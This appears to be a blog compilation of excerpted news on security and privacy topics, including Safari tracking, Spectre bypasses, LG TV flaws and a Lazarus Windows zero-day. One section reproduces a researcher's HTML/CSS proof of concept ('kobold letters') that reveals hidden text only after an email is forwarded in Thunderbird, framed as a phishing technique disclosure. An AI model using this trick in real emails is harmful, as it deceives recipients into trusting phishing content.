Apple – which advertises Safari as “incredibly private” – evidently has undermined privacy among European Union Safari users through a marketplace-kit: URI scheme that potentially allows approved third-party app stores to follow those users around the web.

[…]

The trouble is, any site can trigger a marketplace-kit: request. On EU iOS 17.4 devices, that will cause a unique per-user identifier to be fired off by Safari to an approved marketplace’s servers, leaking the fact that the user was just visiting that site. This happens even if Safari is in private browsing mode. The marketplace’s servers can reject the request, which can also include a custom payload, passing more info about the user to the alternative store.

[…]

Apple doesn’t allow third-party app stores in most parts of the world, citing purported privacy and security concerns – and presumably interest in sustaining its ability to collect commissions for software sales.

But Apple has been designated as a “gatekeeper” under Europe’s Digital Markets Act (DMA) for iOS, the App Store, Safari, and just recently iPadOS.

That designation means the iBiz has been ordered to open its gated community so that European customers can choose third-party app stores and web-based app distribution – also known as side-loading.

But wait, there’s more

According to Bakry and Mysk, Apple’s URI scheme has three significant failings. First, they say, it fails to check the origin of the website, meaning the aforementioned cross-site tracking is possible.

Second, Apple’s MarketplaceKit – its API for third-party stores – doesn’t validate the JSON Web Tokens (JWT) passed as input parameters via incoming requests. “Worse, it blindly relayed the invalid JWT token when calling the /oauth/token endpoint,” observed Bakry and Mysk. “This opens the door to various injection attacks to target either the MarketplaceKit process or the marketplace back-end.”

And third, Apple isn’t using certificate pinning, which leaves the door open for meddling by an intermediary (MITM) during the MarketplaceKit communication exchange. Bakry and Mysk claim they were able to overwrite the servers involved in this process with their own endpoints.

The limiting factor of this attack is that a marketplace must first be approved by Apple before it can undertake this sort of tracking. At present, not many marketplaces have won approval. We’re aware of the B2B Mobivention App marketplace, AltStore, and Setapp. Epic Games has also planned an iOS store. A few other marketplaces will work after an iThing jailbreak, but they’re unlikely to attract many consumers.

Nope, the costs to set up your own store are prohibitive and you still have to funnel proceeds to Apple – see also Shameless Insult, Malicious Compliance, Junk Fees, Extortion Regime: Industry Reacts To Apple’s Proposed Changes Over Digital Markets Act

“The flaw of exposing users in the EU to tracking is the result of Apple insisting on inserting itself between marketplaces and their users,” asserted Bakry and Mysk. “This is why Apple needs to pass an identifier to the marketplaces so they can identify installs and perhaps better calculate the due Core Technology Fee (CTF).”

They urge iOS users in Europe to use Brave rather than Safari because Brave’s implementation checks the origin of the website against the URL to prevent cross-site tracking.

Back when Apple planned not to support Home Screen web apps in Europe – a gambit later abandoned after developer complaints and regulatory pressure – the iGiant justified its position by arguing the amount of work required “was not practical to undertake given the other demands of the DMA.” By not making the extra effort to implement third-party app stores securely, Apple has arguably turned its security and privacy concerns into a self-fulfilling prophecy.

In its remarks [PDF] on complying with the DMA, Apple declared, “In the EU, every user’s security, privacy, and safety will depend in part on two questions. First, are alternative marketplaces and payment processors capable of protecting users? And, second, are they interested in doing so?”

There’s also the question of whether Apple is capable of protecting users – and whether it’s interested in doing so.

[…]

Source: Apple’s ‘incredibly private’ Safari not so private in Europe • The Register

CSS allows HTML emails to change their content after they have been forwarded

[…] The email your manager received and forwarded to you was something completely innocent, such as a potential customer asking a few questions. All that email was supposed to achieve was being forwarded to you. However, the moment the email appeared in your inbox, it changed. The innocent pretext disappeared and the real phishing email became visible. A phishing email you had to trust because you knew the sender and they even confirmed that they had forwarded it to you.

This attack is possible because most email clients allow CSS to be used to style HTML emails. When an email is forwarded, the position of the original email in the DOM usually changes, allowing for CSS rules to be selectively applied only when an email has been forwarded.

An attacker can use this to include elements in the email that appear or disappear depending on the context in which the email is viewed. Because they are usually invisible, only appear in certain circumstances, and can be used for all sorts of mischief, I’ll refer to these elements as kobold letters, after the elusive sprites of mythology.

This affects all types of email clients and webmailers that support HTML email. So pretty much all of them. For the moment, however, I’ll focus on selected clients to demonstrate the problem, and leave it to others (or future me) to extend the principle to other clients.

[…]

Exploiting this in Thunderbird is fairly straightforward. Thunderbird wraps emails in <div class="moz-text-html" lang="x-unicode"></div> and leaves them otherwise unchanged, making it a good example to demonstrate the principle. When forwarding an email, the quoted email will be enclosed in another <div></div>, moving it down one level in the DOM.

Taking this into account leads to the following proof of concept:

<!DOCTYPE html>
<html>

<head>
    <style>
        .kobold-letter {
            display: none;
        }

        .moz-text-html>div>.kobold-letter {
            display: block !important;
        }
    </style>
</head>

<body>
    <p>This text is always visible.</p>
    <p class="kobold-letter">This text will only appear after forwarding.</p>
</body>

</html>

The email contains two paragraphs, one that has no styling and should always be visible, and one that is hidden with display: none;. This is how it looks when the email is displayed in Thunderbird:

A simple email containing the sentence "This text is always visible."

This email may look harmless…

As expected, only the paragraph “This text is always visible.” is shown. However, when we forward the email, the second paragraph becomes suddenly visible. Albeit only to the new recipient – the original recipient who forwarded the email remains unaware.

The sentence "This text will only appear after forwarding." is now visible.

…until it has been forwarded.

Because we know exactly where each element will be in the DOM relative to .moz-text-html, and because we control the CSS, we can easily hide and show any part of the email, changing the content completely. If we style the kobold letter as an overlay, we can not only affect the forwarded email, but also (for example) replace any comments your manager might have had on the original mail, opening up even more opportunities for phishing.

[…]

Source: Kobold letters – Lutra Security

Intel CPUs still vulnerable to Spectre attack

[…] We’re told mitigations put in place at the software and silicon level by the x86 giant to thwart Spectre-style exploitation of its processors’ speculative execution can be bypassed, allowing malware or rogue users on a vulnerable machine to steal sensitive information – such as passwords and keys – out of kernel memory and other areas of RAM that should be off limits.

The boffins say they have developed a tool called InSpectre Gadget that can find snippets of code, known as gadgets, within an operating system kernel that on vulnerable hardware can be abused to obtain secret data, even on chips that have Spectre protections baked in.

[…]

“We show that our tool can not only uncover new (unconventionally) exploitable gadgets in the Linux kernel, but that those gadgets are sufficient to bypass all deployed Intel mitigations,” the VU Amsterdam team said this week. “As a demonstration, we present the first native Spectre-v2 exploit against the Linux kernel on last-generation Intel CPUs, based on the recent BHI variant and able to leak arbitrary kernel memory at 3.5 kB/sec.”

A quick video demonstrating that Native BHI-based attack to grab the /etc/shadow file of usernames and hashed passwords out of RAM on a 13th-gen Intel Core processor is below. We’re told the technique, tagged CVE-2024-2201, will work on any Intel CPU core.

The VU Amsterdam team — Sander Wiebing, Alvise de Faveri Tron, Herbert Bos and Cristiano Giuffrida — have now open sourced InSpectre Gadget, an angr-based analyzer, plus a database of gadgets found for Linux Kernel 6.6-rc4 on GitHub.

“Our efforts led to the discovery of 1,511 Spectre gadgets and 2,105 so-called ‘dispatch gadgets,'” the academics added. “The latter are very useful for an attacker, as they can be used to chain gadgets and direct speculation towards a Spectre gadget.”

[…]

AMD and Arm cores are not vulnerable to Native BHI, according to the VU Amsterdam team. AMD has since confirmed this in an advisory

[…]

After the aforementioned steps were taken to shut down BHI-style attacks, “this mitigation left us with a dangling question: ‘Is finding ‘native’ Spectre gadgets for BHI, ie, not implanted through eBPF, feasible?'” the academics asked.

The short answer is yes. A technical paper [PDF] describing Native BHI is due to be presented at the USENIX Security Symposium.

Source: Tool finds new ways to exploit Spectre holes in Intel CPUs • The Register

Critical bugs in LG TVs could allow complete device takeover

A handful of bugs in LG smart TVs running WebOS could allow an attacker to bypass authorization and gain root access on the device.

Once they have gained root, your TV essentially belongs to the intruder who can use that access to do all sorts of nefarious things including moving laterally through your home network, dropping malware, using the device as part of a botnet, spying on you — or at the very least severely screwing up your streaming service algorithms.

Bitdefender Labs researcher Alexandru Lazăr spotted the four vulnerabilities that affect WebOS versions 4 through 7. In an analysis published today, the security firm noted that while the vulnerable service is only intended for LAN access, more than 91,000 devices are exposed to the internet, according to a Shodan scan.

Here’s a look at the four flaws:

  • CVE-2023-6317: a PIN/prompt bypass that allows an attacker to set a variable and add a new user account to the TV without requiring a security PIN. It has a CVSS rating of 7.2.
  • CVE-2023-6318: a critical command injection flaw with a 9.1 CVSS rating that allows an attacker to elevate an initial access to root-level privileges and take over the TV.
  • CVE-2023-6319: another 9.1-rated command injection vulnerability that can be triggered by manipulating the music-lyrics library.
  • CVE-2023-6320: a critical command injection vulnerability that can be triggered by manipulating an API endpoint to allow execution of commands on the device as dbus, which has similar permissions as root. It also received a 9.1 CVSS score.

In order to abuse any of the command injection flaws, however, the attacker must first exploit CVE-2023-6317. This issue is down to WebOS running a service on ports 3000/3001 that allows users to control their TV on their smartphone using a PIN. But, there’s a bug in the account handler function that sometimes allows skipping the PIN verification:

The function that handles account registration requests uses a variable called skipPrompt which is set to true when either the client-key or the companion-client-key parameters correspond to an existing profile. It also takes into consideration what permissions are requested when deciding whether to prompt the user for a PIN, as confirmation is not required in some cases.

After creating an account with no permissions, an attacker can then request a new account with elevated privileges “but we specify the companion-client-key variable to match the key we got when we created the first account,” the team reports.

The server confirms that the key exists, but doesn’t verify which account it belongs to, we’re told. “Thus, the skipPrompt variable will be true and the account will be created without requesting a PIN confirmation on the TV,” the team reports

And then, after creating this account with elevated privileges, an attacker can use that access to exploit the other three flaws that lead to root access or command execution as the dbus user.

Lazăr responsibly reported the flaws to LG on November 1, 2023, and LG asked for a time extension to fix them. The electronics giant issued patches on March 22. It’s a good idea to check your TV for software updates and apply the WebOS patch now.

Source: Critical bugs in LG TVs could allow complete device takeover

In-app browsers still a privacy, security, and choice issue

[…] Open Web Advocacy (OWA), a group that supports open web standards and fair competition, said in a post on Tuesday that representatives “recently met with both the [EU’s] Digital Markets Act team and the UK’s Market Investigation Reference into Cloud Gaming and Browsers team to discuss how tech giants are subverting users’ choice of default browser via in-app browsers and the harm this causes.”

OWA argues that in-app browsers, without notice or consent, “ignore your choice of default browser and instead automatically and silently replace your default browser with their own in-app browser.”

The group’s goal isn’t to ban the technology, which has legitimate uses. Rather it’s to prevent in-app browsers from being used to thwart competition and flout user choice.

In-app browsers are like standalone web browsers without the interface – they rely on the native app for the interface. They can be embedded in native platform apps to load and render web content within the app, instead of outside the app in the designated default browser.

[…]

The problem with in-app browsers is that they play by a different set of rules from standalone browsers. As noted by OWA in its 62-page submission [PDF] to regulators:

  • They override the user’s choice of default browser
  • They raise tangible security and privacy harms
  • They stop the user from using their ad-blockers and tracker blockers
  • Their default browsers privacy and security settings are not shared
  • They are typically missing web features
  • They typically have many unique bugs and issues
  • The user’s session state is not shared so they are booted out of websites they have logged into in their default browser
  • They provide little benefit to users
  • They create significant work and often break third-party websites
  • They don’t compete as browsers
  • They confuse users and today function as dark patterns

Since around 2016, software engineers involved in web application development started voicing concerns about in-app browsers at some of the companies using them. But it wasn’t until around 2019 when Google engineer Thomas Steiner published a blog post about Facebook’s use of in-app browsers in its iOS and Android apps that the privacy and choice impact of in-app browsers began to register with a wider audience.

Steiner observed: “WebViews can also be used for effectively conducting intended man-in-the-middle attacks, since the IAB [in-app browser] developer can arbitrarily inject JavaScript code and also intercept network traffic.” He added: “Most of the time, this feature is used for good.”

[…]

In August 2022, developer Felix Krause published a blog post titled “Instagram and Facebook can track anything you do on any website in their in-app browser.” A week later, he expanded his analysis of in-app browsers to note how TikTok’s iOS app injects JavaScript to subscribe to “every keystroke (text inputs) happening on third party websites rendered inside the TikTok app”

[…]

Even assuming one accepts Meta’s and TikTok’s claims that they’ve not misused the extraordinary access granted by in-app browsers – a difficult ask in light of allegations raised in ongoing Meta litigation – the issue remains that companies implementing in-app browsers may be overriding the choices of users regarding their browser and whatever extensions they have installed.

However, Meta does provide a way to opt out of having its in-app browser open links clicked in its Facebook and Instagram apps.

[…]

As for the Competition and Markets Authority (CMA), the UK watchdog appears to be willing to consider allowing developer choice to supersede user choice, or at least that was the case two years ago. In its 2022 response to the CMA’s Interim Report, Google observed [PDF] that the competition agency itself had conceded that in an Android native app, the choice of browser belongs to the app developer rather than to Google.

“The Interim Report raises concerns about in-app browsers overriding users’ chosen default browsers,” Google said in its response. “However, as the CMA rightly notes, the decision on whether a native app launches an in-app browser, and if so, which browser, lies with the respective app developer, not Google. Having control over whether or not an in-app browser is launched allows app developers to customize their user interfaces, which can in turn improve the experience for users. There is therefore, to some extent, a trade-off between offering developers choice and offering end users choice.”

Source: In-app browsers still a privacy, security, and choice issue • The Register

However, in-app browsers are a horrible security breach and the choice should belong to the user – not Google, not an app developer.

GitHub’s new AI-powered tool auto-fixes vulnerabilities in your code

GitHub introduced a new AI-powered feature capable of speeding up vulnerability fixes while coding. This feature is in public beta and automatically enabled on all private repositories for GitHub Advanced Security (GHAS) customers.

Known as Code Scanning Autofix and powered by GitHub Copilot and CodeQL, it helps deal with over 90% of alert types in JavaScript, Typescript, Java, and Python.

After being toggled on, it provides potential fixes that GitHub claims will likely address more than two-thirds of found vulnerabilities while coding with little or no editing.

“When a vulnerability is discovered in a supported language, fix suggestions will include a natural language explanation of the suggested fix, together with a preview of the code suggestion that the developer can accept, edit, or dismiss,” GitHub’s Pierre Tempel and Eric Tooley said.

The code suggestions and explanations it provides can include changes to the current file, multiple files, and the current project’s dependencies.

Implementing this approach can significantly reduce the frequency of vulnerabilities that security teams must handle daily.

This, in turn, enables them to concentrate on ensuring the organization’s security rather than being forced to allocate unnecessary resources to keep up with new security flaws introduced during the development process.

However, it’s also important to note that developers should always verify if the security issues are resolved, as GitHub’s AI-powered feature may suggest fixes that only partially address the security vulnerability or fail to preserve the intended code functionality.

“Code scanning autofix helps organizations slow the growth of this “application security debt” by making it easier for developers to fix vulnerabilities as they code,” added Tempel and Tooley.

“Just as GitHub Copilot relieves developers of tedious and repetitive tasks, code scanning autofix will help development teams reclaim time formerly spent on remediation.”

The company plans to add support for additional languages in the coming months, with C# and Go support coming next.

More details about the GitHub Copilot-powered code scanning autofix tool are available on GitHub’s documentation website.

Last month, the company also enabled push protection by default for all public repositories to stop the accidental exposure of secrets like access tokens and API keys when pushing new code.

This was a significant issue in 2023, as GitHub users accidentally exposed 12.8 million authentication and sensitive secrets via more than 3 million public repositories throughout the year.

As BleepingComputer reported, exposed secrets and credentials have been exploited for multiple high-impact breaches [123] in recent years.

Source: GitHub’s new AI-powered tool auto-fixes vulnerabilities in your code

Italy’s Piracy Shield Blocks Innocent Web Sites, Makes It Hard For Them To Appeal so ISPs are ignoring the law because it’s stupid

Italy’s newly-installed Piracy Shield system, put in place by the country’s national telecoms regulator, Autorità per le Garanzie nelle Comunicazioni (Authority for Communications Guarantees, AGCOM), is already failing in significant ways. One issue became evident in February, when the VPN provider AirVPN announced that it would no longer accept users resident in Italy because of the “burdensome” requirements of the new system. Shortly afterwards, TorrentFreak published a story about the system crashing under the weight of requests to block just a few hundred IP addresses. Since there are now around two billion copyright claims being made every year against YouTube material, it’s unlikely that Piracy Shield will be able to cope once takedown requests start ramping up, as they surely will.

That’s a future problem, but something that has already been encountered concerns one of the world’s largest and most important content delivery networks (CDN), Cloudflare. CDNs have a key function in the Internet’s ecology. They host and deliver digital material to users around the globe, using their large-scale infrastructure to provide this quickly and efficiently on behalf of Web site owners. Blocking CDN addresses is reckless: it risks affecting thousands or even millions of sites, and compromises some of the basic plumbing of the Internet. And yet according to a post on TorrentFreak, that is precisely what Piracy Shield has now done:

Around 16:13 on Saturday [24 February], an IP address within Cloudflare’s AS13335, which currently accounts for 42,243,794 domains according to IPInfo, was targeted for blocking [by Piracy Shield]. Ownership of IP address 188.114.97.7 can be linked to Cloudflare in a few seconds, and doubled checked in a few seconds more.

The service that rightsholders wanted to block was not the IP address’s sole user. There’s a significant chance of that being the case whenever Cloudflare IPs enter the equation; blocking this IP always risked taking out the target plus all other sites using it.

The TorrentFreak article lists a few of the evidently innocent sites that were indeed blocked by Piracy Shield, and notes:

Around five hours after the blockade was put in place, reports suggest that the order compelling ISPs to block Cloudflare simply vanished from the Piracy Shield system. Details are thin, but there is strong opinion that the deletion may represent a violation of the rules, if not the law.

That lack of transparency about what appears to be a major overblocking is part of a larger problem, which affects those who are wrongfully cut off. As TorrentFreak writes, AGCOM’s “rigorous complaint procedure” for Piracy Shield “effectively doesn’t exist”:

information about blocks that should be published to facilitate correction of blunders, is not being published, also in violation of the regulations.

That matters, because appeals against Piracy Shield’s blocks can only be made within five working days of their publication. As a result, the lack of information about erroneous blocks makes it almost impossible for those affected to appeal in time:

That raises the prospect of a blocked innocent third party having to a) proactively discover that their connectivity has been limited b) isolate the problem to Italy c) discover the existence of AGCOM d) learn Italian and e) find the blocking order relating to them.

No wonder, then that:

some ISPs, having seen the mess, have decided to unblock some IP addresses without permission from those who initiated the mess, thus contravening the rules themselves.

In other words, not only is the Piracy Shield system wrongly blocking innocent sites, and making it hard for them to appeal against such blocks, but its inability to follow the law correctly is causing ISPs to ignore its rulings, rendering the system pointless.

This combination of incompetence and ineffectiveness brings to mind an earlier failed attempt to stop people sharing unauthorized copies. It’s still early days, but there are already indications that Italy’s Piracy Shield could well turn out to be a copyright fiasco on the same level as France’s Hadopi system, discussed in detail in Walled Culture the book (digital versions available free).

Source: Italy’s Piracy Shield Blocks Innocent Web Sites And Makes It Hard For Them To Appeal | Techdirt

Commercial Bank of Ethiopia glitch lets customers withdraw millions

Ethiopia’s biggest commercial bank is scrambling to recoup large sums of money withdrawn by customers after a “systems glitch”.

The customers discovered early on Saturday that they could take out more cash than they had in their accounts at the Commercial Bank of Ethiopia (CBE).

More than $40m (£31m) was withdrawn or transferred to other banks, local media reported.

It took several hours for the institution to freeze transactions.

Much of the money was withdrawn from state-owned CBE by students, bank president Abe Sano told journalists on Monday.

News of the glitch spread across universities largely via messaging apps and phone calls.

Long lines formed at campus ATMs, with a student in western Ethiopia telling BBC Amharic people were withdrawing money until police officers arrived on campus to stop them.

[…]

Ethiopia’s central bank, which serves as the financial sector’s governing body, released a statement on Sunday saying “a glitch” had occurred during “maintenance and inspection activities”.

The statement, however, focused on the interrupted service that occurred after CBE froze all transactions. It did not mention the money withdrawn by customers.

Mr Sano did not say exactly how much money was withdrawn during Saturday’s incident, but said the loss incurred was small when compared to the bank’s total assets.

He stated that CBE was not hit by a cyber-attack and that customers should not be worried as their personal accounts were intact.

At least three universities have released statements advising students to return any money not belonging to them that they may have taken from CBE.

Anyone returning money will not be charged with a criminal offence, Mr Sano said.

But it’s not clear how successful the bank’s attempts to recoup their money has been so far.

The student from Jimma University said on Monday he had not heard of anyone giving the money back, but said he had seen police vehicles on campus.

[…]

Source: Commercial Bank of Ethiopia glitch lets customers withdraw millions

VPN Demand Surges 234.8% After Adult Site Restriction on Texas-Based Users

VPN demand in Texas skyrocketed by 234.8% on March 15, 2024, after state authorities enacted a law requiring adult sites to verify users’ ages before granting them access to the websites’ content.

Texas’ age verification law was passed in June 2023 and was set to take effect in September of the same year. However, a day before its implementation, a US district judge temporarily blocked enforcement after a lawsuit filed by the Free Speech Coalition (FSC) deemed the policy unconstitutional per the First Amendment.

On March 14, 2024, the US Court of Appeals for the 5th Circuit decreed that Texas could proceed with the law’s enactment.

As a sign of protest, Pornhub, the most visited adult site in the US, blocked IP addresses from Texas — the eighth state to suffer such a ban after their respective governments enforced similar restrictions on adult sites.

[…]

Following the law’s enactment, users in Texas seem to be scrambling for means to access the affected adult sites. vpnMentor’s research team analyzed user demand data and found a 234.8% increase in VPN demand in the state.

The graph below shows the VPN demand in Texas from March 1 to March 16.

Past VPN Demand Growths from Adult Site Restrictions

Pornhub has previously blocked IP addresses from Louisiana, Mississippi, Arkansas, Utah, Virginia, North Carolina, and Montana — all of which have enforced age-verification laws that the adult site deemed unjust.

In May 2023, Pornhub’s banning of Utah-based users caused a 967% spike in VPN demand in the state. That same year, the passing of adult-site-related age restriction laws in Louisiana and Mississippi led to a 200% and 72% surge in VPN interest, respectively.

Source: VPN Demand Surges Post Adult Site Restriction on Texas-Based Users

Under New Management Detects when your extensions have changed owners

Intermittenty checks your installed extensions to see if the developer information listed on the Chrome Web Store or Firefox Addons store has changed. If anything is different, the extension icon will display a red badge, alerting you to the change.

shows the difference when an extension has been changed

Why is this needed?

Extension developers are constantly getting offers to buy their extensions. In nearly every case, the people buying these extensions want to rip off the existing users.

The users of these extensions have no idea an installed extension has changed hands, and may now be compromised.

Under New Management gives users notice of the change of ownership, giving them a chance to make an informed decision about the software they’re using.

Source: Under New Management (Github)

Install for Chrome: https://chromewebstore.google.com/detail/under-new-management/jppepdecgemgbgnjnnfjcmanlleioikj

Install for Firefox: https://addons.mozilla.org/en-US/firefox/addon/under-new-management-v2/

OR

Download a prebuilt release, unpack the .zip file, and load the dist directory into your browser.

How to Prevent X’s Audio and Video Calls Feature From Revealing Your IP Address – wait it reveals your IP address :O – wait… of course, it’s a Musk thing

[…] X began rolling out the audio and video calling feature, which was previously restricted to paid users, to everyone last week. However, hawk-eyed sleuths quickly noticed that the feature was automatically turned on, meaning that users had to manually go to their settings to turn it off. Only your mutuals or someone you’ve exchanged DMs with can call you by default, but that’s still potentially a lot of people.

Privacy researchers also sounded the alarm on the feature after learning that it revealed users’ IP address during calls. Notably, the option to protect users’ IP addresses is toggled off, which frankly makes no sense.

Zach Edwards, an independent privacy researcher, told Gizmodo that an IP address can allow third parties to track down your location and get their hands on other details of your online life.

“In major cities, an IP address can sometimes identify someone’s exact location, but usually it’s just close enough to be creepy. Like a 1 block radius around your house,” Edwards said via X direct messages. However, “sometimes if in a remote/rural location, the IP address 1000% identifies you.”

Law enforcement can use IP addresses to track down illegal behavior, such as child sexual abuse material or pirating online content. Meanwhile, hackers can launch DDoS attacks to take down your internet connection or even steal your data.

How to turn off audio and video calls on X

Luckily, you can avoid potential IP security nightmares by turning off audio and video calls on X. As you’ll see in the screenshots below, it’s pretty straightforward:

– First, go to Settings and Support. Then click on Settings and Privacy. (If you’re on desktop, click on the More button and then go to Settings and Privacy).

– Next, click on Privacy and Safety. Select Direct Messages from the menu that pops up.

– Toggle off the option that says Enable audio and video calling.

A screenshot that shows how to disable audio and video calling on X.
Screenshot: Oscar Gonzalez

And that’s it. Some may not see the Enable audio and video calling option in their settings yet, which means the feature hasn’t been rolled out to them. That doesn’t mean they won’t eventually get it in a future update.

Source: How to Prevent X’s Audio and Video Calls Feature From Revealing Your IP Address

Hackers exploited Windows 0-day for 6 months after Microsoft knew of it

[…]

Even after Microsoft patched the vulnerability last month, the company made no mention that the North Korean threat group Lazarus had been using the vulnerability since at least August to install a stealthy rootkit on vulnerable computers. The vulnerability provided an easy and stealthy means for malware that had already gained administrative system rights to interact with the Windows kernel. Lazarus used the vulnerability for just that. Even so, Microsoft has long said that such admin-to-kernel elevations don’t represent the crossing of a security boundary, a possible explanation for the time Microsoft took to fix the vulnerability.

A rootkit “holy grail”

“When it comes to Windows security, there is a thin line between admin and kernel,” Jan Vojtěšek, a researcher with security firm Avast, explained last week. “Microsoft’s security servicing criteria have long asserted that ‘[a]dministrator-to-kernel is not a security boundary,’ meaning that Microsoft reserves the right to patch admin-to-kernel vulnerabilities at its own discretion. As a result, the Windows security model does not guarantee that it will prevent an admin-level attacker from directly accessing the kernel.”

The Microsoft policy proved to be a boon to Lazarus in installing “FudModule,” a custom rootkit that Avast said was exceptionally stealthy and advanced.

[…]

In years past, Lazarus and other threat groups have reached this last threshold mainly by exploiting third-party system drivers, which by definition already have kernel access. To work with supported versions of Windows, third-party drivers must first be digitally signed by Microsoft to certify that they are trustworthy and meet security requirements. In the event Lazarus or another threat actor has already cleared the admin hurdle and has identified a vulnerability in an approved driver, they can install it and exploit the vulnerability to gain access to the Windows kernel. This technique—known as BYOVD (bring your own vulnerable driver)—comes at a cost, however, because it provides ample opportunity for defenders to detect an attack in progress.

The vulnerability Lazarus exploited, tracked as CVE-2024-21338, offered considerably more stealth than BYOVD because it exploited appid.sys, a driver enabling the Windows AppLocker service, which comes preinstalled in the Microsoft OS. Avast said such vulnerabilities represent the “holy grail,” as compared to BYOVD.

In August, Avast researchers sent Microsoft a description of the zero-day, along with proof-of-concept code that demonstrated what it did when exploited. Microsoft didn’t patch the vulnerability until last month. Even then, the disclosure of the active exploitation of CVE-2024-21338 and details of the Lazarus rootkit came not from Microsoft in February but from Avast 15 days later. A day later, Microsoft updated its patch bulletin to note the exploitation.

[…]

Source: Hackers exploited Windows 0-day for 6 months after Microsoft knew of it | Ars Technica